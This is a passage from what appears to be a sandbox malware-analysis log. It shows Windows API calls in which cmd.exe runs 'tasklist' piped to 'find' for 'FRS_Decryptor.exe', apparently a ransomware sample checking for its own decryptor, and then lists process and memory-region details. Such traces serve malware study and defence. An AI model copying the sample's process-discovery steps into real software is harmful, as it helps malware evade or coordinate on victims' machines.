_String2="cmd ", _MaxCount=0x4) returned 17 [0143.244] SetErrorMode (uMode=0x0) returned 0x0 [0143.244] SetErrorMode (uMode=0x1) returned 0x0 [0143.245] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x715228, lpFilePart=0x5ef47c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5ef47c*="Desktop") returned 0x1c [0143.245] SetErrorMode (uMode=0x0) returned 0x1 [0143.245] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.245] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.249] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.249] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0xffffffff [0143.249] GetLastError () returned 0x2 [0143.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.249] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0x715530 [0143.249] FindClose (in: hFindFile=0x715530 | out: hFindFile=0x715530) returned 1 [0143.250] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0xffffffff [0143.250] GetLastError () returned 0x2 [0143.250] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0x715530 [0143.250] FindClose (in: hFindFile=0x715530 | out: hFindFile=0x715530) returned 1 [0143.250] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.250] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.250] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0143.250] SetErrorMode (uMode=0x0) returned 0x0 [0143.250] SetErrorMode (uMode=0x1) returned 0x0 [0143.250] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x71a3c0, lpFilePart=0x5ef224 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5ef224*="Desktop") returned 0x1c [0143.250] SetErrorMode (uMode=0x0) returned 0x1 [0143.250] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.250] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.250] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.250] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.250] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0xffffffff [0143.251] GetLastError () returned 0x2 [0143.251] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.251] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0x715628 [0143.251] FindClose (in: hFindFile=0x715628 | out: hFindFile=0x715628) returned 1 [0143.251] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0xffffffff [0143.251] GetLastError () returned 0x2 [0143.251] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0x715628 [0143.251] FindClose (in: hFindFile=0x715628 | out: hFindFile=0x715628) returned 1 [0143.251] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.251] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.251] GetConsoleTitleW (in: lpConsoleTitle=0x5ef4ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.251] InitializeProcThreadAttributeList (in: lpAttributeList=0x5ef3d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5ef3bc | out: lpAttributeList=0x5ef3d8, lpSize=0x5ef3bc) returned 1 [0143.251] UpdateProcThreadAttribute (in: lpAttributeList=0x5ef3d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x5ef3c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5ef3d8, lpPreviousValue=0x0) returned 1 [0143.252] GetStartupInfoW (in: lpStartupInfo=0x5ef410 | out: lpStartupInfo=0x5ef410*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.252] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.253] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.253] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5ef360*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5ef3ac | out: lpCommandLine="tasklist", lpProcessInformation=0x5ef3ac*(hProcess=0x64, hThread=0x60, dwProcessId=0xa38, dwThreadId=0x880)) returned 1 [0143.257] CloseHandle (hObject=0x60) returned 1 [0143.257] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.257] GetEnvironmentStringsW () returned 0x7142d8* [0143.257] FreeEnvironmentStringsA (penv="=") returned 1 [0143.257] DeleteProcThreadAttributeList (in: lpAttributeList=0x5ef3d8 | out: lpAttributeList=0x5ef3d8) [0143.257] _get_osfhandle (_FileHandle=3) returned 0x54 [0143.257] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0143.257] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0143.257] _close (_FileHandle=5) returned 0 [0143.257] _dup (_FileHandle=0) returned 4 [0143.257] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0143.257] _close (_FileHandle=3) returned 0 [0143.257] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0143.257] SetErrorMode (uMode=0x0) returned 0x0 [0143.257] SetErrorMode (uMode=0x1) returned 0x0 [0143.257] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7142e0, lpFilePart=0x5ef47c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5ef47c*="Desktop") returned 0x1c [0143.257] SetErrorMode (uMode=0x0) returned 0x1 [0143.257] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.257] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.257] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.258] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0xffffffff [0143.258] GetLastError () returned 0x2 [0143.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0x715628 [0143.258] FindClose (in: hFindFile=0x715628 | out: hFindFile=0x715628) returned 1 [0143.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0xffffffff [0143.258] GetLastError () returned 0x2 [0143.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5ef208, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef208) returned 0x715628 [0143.258] FindClose (in: hFindFile=0x715628 | out: hFindFile=0x715628) returned 1 [0143.258] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.258] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.258] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0143.258] SetErrorMode (uMode=0x0) returned 0x0 [0143.258] SetErrorMode (uMode=0x1) returned 0x0 [0143.259] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x714668, lpFilePart=0x5ef224 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5ef224*="Desktop") returned 0x1c [0143.259] SetErrorMode (uMode=0x0) returned 0x1 [0143.259] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.259] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.259] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.259] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0xffffffff [0143.259] GetLastError () returned 0x2 [0143.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.259] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0x7104a0 [0143.259] FindClose (in: hFindFile=0x7104a0 | out: hFindFile=0x7104a0) returned 1 [0143.259] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0xffffffff [0143.260] GetLastError () returned 0x2 [0143.260] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5eefb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eefb0) returned 0x7104a0 [0143.260] FindClose (in: hFindFile=0x7104a0 | out: hFindFile=0x7104a0) returned 1 [0143.260] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0143.260] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0143.260] GetConsoleTitleW (in: lpConsoleTitle=0x5ef4ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.260] InitializeProcThreadAttributeList (in: lpAttributeList=0x5ef3d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5ef3bc | out: lpAttributeList=0x5ef3d8, lpSize=0x5ef3bc) returned 1 [0143.260] UpdateProcThreadAttribute (in: lpAttributeList=0x5ef3d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x5ef3c4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5ef3d8, lpPreviousValue=0x0) returned 1 [0143.260] GetStartupInfoW (in: lpStartupInfo=0x5ef410 | out: lpStartupInfo=0x5ef410*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2b8, hStdError=0x2c)) [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.260] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.261] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.261] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0143.261] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5ef360*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5ef3ac | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x5ef3ac*(hProcess=0x60, hThread=0x54, dwProcessId=0x7bc, dwThreadId=0x870)) returned 1 [0143.263] CloseHandle (hObject=0x54) returned 1 [0143.263] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.263] GetEnvironmentStringsW () returned 0x71ad78* [0143.264] FreeEnvironmentStringsA (penv="=") returned 1 [0143.264] DeleteProcThreadAttributeList (in: lpAttributeList=0x5ef3d8 | out: lpAttributeList=0x5ef3d8) [0143.264] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0143.264] _close (_FileHandle=4) returned 0 [0143.264] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0143.791] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x5ef720 | out: lpExitCode=0x5ef720*=0x0) returned 1 [0143.791] CloseHandle (hObject=0x64) returned 1 [0143.791] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0143.793] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x5ef720 | out: lpExitCode=0x5ef720*=0x0) returned 1 [0143.793] CloseHandle (hObject=0x60) returned 1 [0143.793] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0143.793] SetConsoleMode (hConsoleHandle=0x2b8, dwMode=0x0) returned 0 [0143.793] _get_osfhandle (_FileHandle=1) returned 0x2b8 [0143.794] GetConsoleMode (in: hConsoleHandle=0x2b8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0143.794] _get_osfhandle (_FileHandle=0) returned 0x24 [0143.794] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0143.794] SetConsoleInputExeNameW () returned 0x1 [0143.794] GetConsoleOutputCP () returned 0x1b5 [0143.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0143.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.795] exit (_Code=0) Process: id = "160" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x74f7c000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "159" os_parent_pid = "0x860" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8148 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 8149 start_va = 0x5d0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 8150 start_va = 0x5f0000 end_va = 0x5f1fff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 8151 start_va = 0x600000 end_va = 0x60efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 8152 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8153 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 8154 start_va = 0x690000 end_va = 0x693fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 8155 start_va = 0x6a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 8156 start_va = 0x6b0000 end_va = 0x6b1fff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 8157 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8158 start_va = 0x7e820000 end_va = 0x7e842fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e820000" filename = "" Region: id = 8159 start_va = 0x7e84b000 end_va = 0x7e84dfff 